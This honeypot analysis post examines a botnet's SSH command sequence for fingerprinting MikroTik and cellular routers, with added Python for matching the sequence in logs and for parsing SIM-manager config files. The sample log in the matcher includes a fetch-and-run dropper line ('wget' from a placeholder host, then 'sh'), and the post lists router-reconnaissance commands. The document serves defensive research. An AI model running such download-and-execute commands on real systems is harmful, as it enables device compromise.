A Botnet's Search for MikroTik Routers
Last updated: 2021-09-20
Last Updated: 2021-02-04
Last month, I wrote a post about setting up honeypots on GCP, where I stood up a low-interaction SSH honeypot. Since then, I have logged a few megabytes' worth of unauthorized activity. This post reports on a repeated security event targeting misconfigured MikroTik routers.
Event Behavior
The attacker logs into the honeypot with the credentials admin/password and then sends the commands below to the honeypot shell. Several source IP addresses have been logged entering the same command sequence, which suggests botnet activity. These source IPs are listed at the end of the post.
/ip cloud print
ifconfig
uname -a
cat /proc/cpuinfo
ps | grep '[Mm]iner'
ps -ef | grep '[Mm]iner'
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
echo Hi | cat -n
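Added example: the detection logic a practitioner would run over honeypot session logs to pick out this command profile and produce the per-IP counts given at the end of the post. It is not tooling from the original post or from Honeytrap. The tab-separated log format, the helper names and the log lines themselves are assumptions made for this example; the sample log is constructed and uses documentation-only addresses.

```python
"""Match honeypot SSH sessions against the MikroTik-probing command profile.

Added example, not code from the original post or from Honeytrap. Assumed log
format: one tab-separated line per command, source_ip<TAB>session_id<TAB>command.
"""
from collections import Counter, defaultdict

# The command sequence observed in the post, in the order it was typed.
PROFILE = [
    "/ip cloud print",
    "ifconfig",
    "uname -a",
    "cat /proc/cpuinfo",
    "ps | grep '[Mm]iner'",
    "ps -ef | grep '[Mm]iner'",
    "echo Hi | cat -n",
]

# Constructed sample log (not real honeypot output). Session s1 is the full
# profile including the long ls -la, s2 the profile without it, s3 an unrelated
# dropper, s4 a partial probe.
SAMPLE_LOG = """\
203.0.113.10\ts1\t/ip cloud print
203.0.113.10\ts1\tifconfig
203.0.113.10\ts1\tuname -a
203.0.113.10\ts1\tcat /proc/cpuinfo
203.0.113.10\ts1\tps | grep '[Mm]iner'
203.0.113.10\ts1\tps -ef | grep '[Mm]iner'
203.0.113.10\ts1\tls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/*
203.0.113.10\ts1\techo Hi | cat -n
203.0.113.10\ts2\t/ip cloud print
203.0.113.10\ts2\tifconfig
203.0.113.10\ts2\tuname -a
203.0.113.10\ts2\tcat /proc/cpuinfo
203.0.113.10\ts2\tps | grep '[Mm]iner'
203.0.113.10\ts2\tps -ef | grep '[Mm]iner'
203.0.113.10\ts2\techo Hi | cat -n
198.51.100.7\ts3\tuname -a
198.51.100.7\ts3\twget http://example.invalid/x.sh
198.51.100.7\ts3\tsh x.sh
192.0.2.99\ts4\tuname -a
192.0.2.99\ts4\tifconfig
192.0.2.99\ts4\techo Hi | cat -n
"""


def normalize(command: str) -> str:
    """Collapse whitespace runs so spacing differences do not break matching."""
    return " ".join(command.split())


def parse_log(text: str) -> dict:
    """Group commands by (source_ip, session_id), preserving the order typed."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, session, command = line.split("\t", 2)
        sessions[(ip, session)].append(normalize(command))
    return sessions


def ordered_matches(profile, commands):
    """Profile commands that appear in `commands` in profile order.

    Extra commands between profile entries (such as the long ls -la) are
    ignored, and an absent profile entry is skipped rather than breaking the
    match, so a partial probe still gets a partial score.
    """
    matched, pos = [], 0
    for want in profile:
        for i in range(pos, len(commands)):
            if commands[i] == want:
                matched.append(want)
                pos = i + 1
                break
    return matched


def profile_score(commands, profile=PROFILE) -> float:
    """Fraction of the profile seen, in order, in one session."""
    return len(ordered_matches(profile, commands)) / len(profile)


def classify(text: str, threshold: float = 1.0):
    """Return [(ip, session, score)] for sessions scoring at or above threshold."""
    hits = []
    for (ip, session), commands in parse_log(text).items():
        score = profile_score(commands)
        if score >= threshold:
            hits.append((ip, session, score))
    return hits


def ip_summary(text: str, threshold: float = 1.0) -> Counter:
    """Full-profile sessions per source IP: the post's 'multiple times' vs 'once' split."""
    return Counter(ip for ip, _, _ in classify(text, threshold))


if __name__ == "__main__":
    for ip, session, score in classify(SAMPLE_LOG, threshold=0.0):
        print(f"{ip:<15} {session:<4} score={score:.2f}")
    counts = ip_summary(SAMPLE_LOG)
    print("captured multiple times:", [ip for ip, n in counts.items() if n > 1])
    print("captured once:", [ip for ip, n in counts.items() if n == 1])
```

Matching on an ordered subsequence rather than an exact list is deliberate: the sequence in this post and the one Verhoef published differ by a few inserted commands, and a threshold below 1.0 lets you catch variants without a new signature per variant.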
Observations
To attribute this behavior to a malware campaign, we need to analyze what the attacking entity actually does. This section relates each command to a plausible motive in an attempt to learn more about the event.
/ip cloud print
The command /ip cloud print prints the IP Cloud settings (MikroTik's dynamic DNS and time-synchronisation service) of RouterOS, the operating system used by MikroTik devices. You can read about this command in the MikroTik wiki. No other tools using this command have been identified, so the command appears to be specific to MikroTik devices; on an ordinary Linux shell it simply fails, because the shell tries to execute a program named /ip. That makes it a cheap first check for whether the attacker has landed on RouterOS. MikroTik is a popular networking vendor based in Latvia. We will return to MikroTik later in this post.
ifconfig, uname, /proc/cpuinfo
The attackers run ifconfig, uname, and cat /proc/cpuinfo, in that order. ifconfig prints networking information. Called with no flags, it prints the active network interfaces, including their IP addresses and what kind of interfaces are present. Interface names can give clues about the environment a device is running in. For example, running ifconfig in a GCP Ubuntu 18.04 VM returns the lo loopback interface and ens4; machines with Docker installed also show docker0. A Linux-based router would typically expose eth, wlan or wwan interfaces instead.
uname prints basic system information; uname -a prints all of it (kernel name, hostname, kernel release and build string, architecture). On a GCP Ubuntu 18.04 VM uname -a returns:
$ uname -a
Linux monitor 4.15.0-1091-gcp #104~16.04.1-Ubuntu SMP Tue Dec 15 19:05:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
cat /proc/cpuinfo prints the kernel's view of the CPU, one block of fields per logical CPU (vendor_id, model name, flags, and so on). On a GCP Ubuntu 18.04 VM the model name is that of the underlying Intel or AMD host CPU and the flags line includes hypervisor, which tells the attacker it is on a virtual machine rather than router hardware; a MIPS- or ARM-based router shows a quite different cpuinfo layout. Together, these three commands gather basic information about the device.
ps -ef | grep '[Mm]iner'
The ps command prints the running processes along with some information about them. In ps -ef, -e selects every process and -f requests the full-format listing. It is interesting that both ps and ps -ef are used in the event. On a procps-based system such as a GCP Ubuntu 18.04 VM, a bare ps lists only the processes attached to the current terminal session (here, the shell and ps itself), while ps -ef lists every process on the host. On minimal BusyBox-based router firmware, a bare ps already lists everything and the -ef flags may not be accepted, so running both forms covers either kind of target.
Piping the process listing to grep '[Mm]iner' returns every line containing miner or Miner. The bracket expression is a common shell trick: the grep process's own command line contains the literal text [Mm]iner, which does not match the pattern, so grep does not report itself as a hit. This behavior suggests the attacker is checking whether a cryptominer is already running on the system, either from a competing botnet or from its own earlier infection. The check is crude, since a miner whose process name does not contain that string goes unnoticed. On a clean GCP Ubuntu 18.04 VM the command returns nothing.
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* ...
The botnet uses ls -la to check for a specific set of device nodes, logs and configuration files. I've associated each path with the router service it most likely belongs to in the table below.
FILE | SERVICE |
---|---|
/dev/ttyGSM* | GSM |
/dev/ttyUSB-mod* | GSM |
/var/spool/sms/* | SMS |
/var/log/smsd.log | SMS |
/etc/smsd.conf* | SMS |
/usr/bin/qmuxd | QMUX |
/var/qmux_connect_socket | QMUX |
/etc/config/simman | Unknown/SIM Card |
/dev/modem* | GSM |
/var/config/sms/* | SMS |
SMS
Yes, SMS as in text messages. SMS stands for Short Message Service, used by mobile phones and by internet-connected devices that carry a cellular modem. MikroTik supports sending and receiving SMS messages via a GSM modem. Users report configuring their MikroTik to use text messages for router management, including receiving health alerts from the router and being able to reset the admin/user password via SMS. See the MikroTik Wiki for more information.
GSM
GSM stands for Global System for Mobile Communications, the 2G standard for mobile telephony. On a MikroTik router, /dev/ttyGSM* may list the virtual serial ports used by the modem under RouterOS (kernel.org, 2011). Users on StackExchange discuss opening a direct serial console to an RB4011 MikroTik router from a PC using sudo screen /dev/ttyUSB0 115200 cs8 ixoff; note that in that case /dev/ttyUSB0 is the USB-to-serial adapter on the administrator's PC, not a device on the router. On the router itself, a /dev/ttyUSB* entry (the botnet checks /dev/ttyUSB-mod*) indicates an attached USB serial device, typically a USB cellular modem, so ls -la on these paths tells the attacker whether the device has a modem it could make use of.
QMUX
/usr/bin/qmuxd points to the QMUX daemon. qmuxd is a Linux user-space process that multiplexes between programs using QMI (Qualcomm MSM Interface) and one or more shared-memory-based QMUX ports offered by the baseband processor (Osmocom, 2019). A GitHub issue from 2017 suggests it is tied to critical modem-related messaging services, and another issue cites qmuxd as the daemon responsible for talking to the modem via shared memory on Android. Its presence on a router indicates a Qualcomm cellular modem, and therefore a device with a SIM card and a data connection.
/etc/config/simman
Limited information on /etc/config/simman is available on common search engines. DuckDuckGo, for instance, returns only two unique results. The only conclusive results for this string were live honeypot dashboards and websites written in Russian. I've translated the relevant results below.
Как изменить APN? : Техническая поддержка nano /etc/config/simman. Меняем параметры option GPRS_apn. config sim0 option priority ‘1’ option GPRS_apn ’tele91.msk’ config sim1 option priority ‘0’ option GPRS_apn ’tele91.msk’ Сохраняем файл с настройками: Ctrl+X потом подтверждаем сохранение под тем же именем
How to change the APN?: Technical Support nano /etc/config/simman. Change the option GPRS_apn parameters. config sim0 option priority '1' option GPRS_apn 'tele91.msk' config sim1 option priority '0' option GPRS_apn 'tele91.msk' Save the settings file: Ctrl+X, then confirm saving under the same name
Настройки Менеджера SIM карт : Техническая поддержка Для настройки Менеджера SIM с помощью консоли, необходимо открыть файл /etc/config/simman: nano /etc/config/simman. В открывшемся окне Вы можете произвести конфигурацию: config simman ‘core’
SIM Card Manager Settings: Technical Support To configure the SIM Manager from the console, open the file /etc/config/simman: nano /etc/config/simman. In the window that opens you can configure: config simman 'core'
This was an additional result returned from Google:
Роутеры TELEOFIS RTU968, RTU1068 V2. Руководство …
Routers TELEOFIS RTU968, RTU1068 V2. Manual …
The translated results suggest the botnet is checking for the configuration file of a SIM card manager. The config/option syntax in these snippets is OpenWrt's UCI configuration format, and /etc/config is the directory where OpenWrt keeps UCI files, so this path points at OpenWrt-based cellular routers (apparently including the TELEOFIS models above) rather than at RouterOS, which has no such file.
On a new GCP Ubuntu 18.04 VM the same ls -la command matches no files: the shell passes each unmatched glob through literally and ls reports "No such file or directory" for every path.
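Added example, not code from the original post or from any router vendor: a small parser for the UCI-style file the botnet is looking for, showing what an attacker who finds and reads /etc/config/simman learns (which SIM slot is active and which APN it dials). It assumes standard UCI syntax (config <type> [name] opens a section; option and list lines belong to it); the sample file is constructed from the translated forum snippets above and real files contain more options.

```python
"""Parse a UCI-style SIM manager configuration such as /etc/config/simman.

Added example, not from the original post or any vendor firmware. Assumes the
OpenWrt UCI syntax: 'config <type> [name]', then 'option <key> <value>' or
'list <key> <value>' lines for that section.
"""
import shlex

# Constructed sample modelled on the translated forum snippets (not a real file).
SAMPLE_SIMMAN = """\
config simman 'core'

config sim0
\toption priority '1'
\toption GPRS_apn 'tele91.msk'

config sim1
\toption priority '0'
\toption GPRS_apn 'tele91.msk'
"""


def parse_uci(text: str) -> list:
    """Return sections as {'type': str, 'name': str | None, 'options': dict}."""
    sections = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        words = shlex.split(line)  # handles the single quotes UCI uses
        keyword, args = words[0], words[1:]
        if keyword == "config":
            if not args:
                raise ValueError(f"config line without a type: {line!r}")
            sections.append({
                "type": args[0],
                "name": args[1] if len(args) > 1 else None,
                "options": {},
            })
        elif keyword in ("option", "list"):
            if not sections or len(args) < 2:
                raise ValueError(f"malformed or orphaned line: {line!r}")
            key, value = args[0], args[1]
            opts = sections[-1]["options"]
            if keyword == "list":
                opts.setdefault(key, []).append(value)
            else:
                opts[key] = value
        elif keyword == "package":
            continue  # package header carries no data we need
        else:
            raise ValueError(f"unknown UCI keyword: {keyword!r}")
    return sections


def sim_sections(sections) -> list:
    """SIM slot sections (sim0, sim1, ...), excluding the 'simman' core section."""
    return [s for s in sections if s["type"].startswith("sim") and s["type"] != "simman"]


def active_sim(sections) -> str:
    """Highest-priority SIM slot: the one the device dials with."""
    sims = sim_sections(sections)
    if not sims:
        raise ValueError("no SIM sections found")
    return max(sims, key=lambda s: int(s["options"].get("priority", "0")))["type"]


def apn_by_sim(sections) -> dict:
    """Map each SIM slot to its configured APN (None when not set)."""
    return {s["type"]: s["options"].get("GPRS_apn") for s in sim_sections(sections)}


if __name__ == "__main__":
    secs = parse_uci(SAMPLE_SIMMAN)
    print("active SIM:", active_sim(secs))
    print("APNs:", apn_by_sim(secs))
```

The point for defenders is the asymmetry: a single ls -la is enough for the bot to learn that this file exists, and a single cat is enough to read it, so the file's mere presence on a host that accepted admin/password already discloses that the box has a live cellular uplink.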
echo Hi | cat -n
To help explain this behavior, here is the expected output of echo Hi | cat -n (cat -n prefixes each line with a right-aligned line number and a tab):
$ echo Hi | cat -n
     1	Hi
Why would a bot want to print "Hi" to the console? Let's step back and look at the series of commands executed. The commands first gather information about the machine with ifconfig and uname. They look for running processes with 'miner' in their name. They check for specific files, all checks that fail on the honeypot. After executing these commands, the unauthorized entity prints a greeting to standard output in an unusual way.
One explanation is that, after determining the machine is a honeypot, the botnet leaves a mark recording that it has identified the machine as a honeypot. The mark could be a flag to prevent the botnet from dropping its malware on research honeypots. Another, simpler explanation is that the command is a sanity check of the shell itself: a pipe between two coreutils commands only produces "     1<tab>Hi" on a real Linux shell, whereas a RouterOS CLI or a low-interaction honeypot that pattern-matches commands will answer with an error or with something else entirely, which tells the operator what kind of system, real or fake, it is talking to.
Analysis
Related Security Researcher Reports
Similar behavior was previously reported by security researcher @remco_verhoef. On June 13th, 2018, Verhoef wrote:
“We’ve found interesting new traffic within our Honeytrap agents, originating from servers within Russia only (to be specific, the netblock owned by NKS / NCNET Broadband)… they are executing all of the following ssh commands:”(SANS, 2018)
/ip cloud print
help
ifconfig
uname -a
show ip
cat /proc/cpuinfo
uptime
ls -la
ls /data/data/com.android.providers.telephony/databases
echo Hi | cat -n
ps | grep '[Mm]iner'
ps -ef | grep '[Mm]iner'
In his post, Verhoef notes that the /ip cloud print command has been deprecated since RouterOS v6.27, indicating that the targeted devices are those running software older than v6.27. Verhoef adds that because "not all of the above commands are programmed to return the output expected by the script, it could be just probing for specifics about the attacked server" (SANS, 2018).
MikroTik & Coinhive Campaign Reports
MikroTik is a router vendor based in Latvia whose devices are widely used in Eastern Europe. On May 23rd, 2018, Cisco Talos reported that some MikroTik devices are vulnerable to the VPNFilter malware; Talos lists the MikroTik Cloud Core Router models 1016, 1036 and 1072, running RouterOS, among the affected devices (the numbers are hardware models, not RouterOS versions). Separately in 2018, compromised MikroTik routers were widely reported to be injecting the Coinhive browser cryptominer into web traffic passing through them.
Two days later, on May 25th, 2018, the FBI issued a public service announcement summarizing:
“Foreign cyber actors have compromised hundreds of thousands of home and office routers and other networked devices worldwide. The actors used VPNFilter malware to target small office and home office routers. The malware is able to perform multiple functions, including possible information collection, device exploitation, and blocking network traffic.”
Analyst Opinion
The security event analyzed in this post has been executed numerous times from several IP addresses against the Honeytrap server hosted in GCP. The botnet appears quite active, crawling the internet for router-class devices with weak username and password configurations. Because the command list mixes a RouterOS command with Linux shell commands and OpenWrt-style file paths, it is probably fingerprinting any cellular or SOHO router it can log into rather than RouterOS alone. The motive of these events has not been confirmed; however, as the FBI notes, there are numerous malicious operations that can be conducted from a compromised router.
Logged IP Addresses
Remember that botnets often operate from compromised endpoints. The IPs listed below are therefore not necessarily the "real" attacking entity; they may be zombified victim hosts or VPN endpoints.
The event described in this post was captured multiple times from each of the following addresses:
51.222.139.65
174.124.123.109
185.110.91.235
The event described in this post was seen once from each of the following hosts:
5.228.46.151
83.165.192.43
97.121.144.188
98.125.186.145
162.104.171.249
176.31.46.240
188.32.225.20
219.94.94.161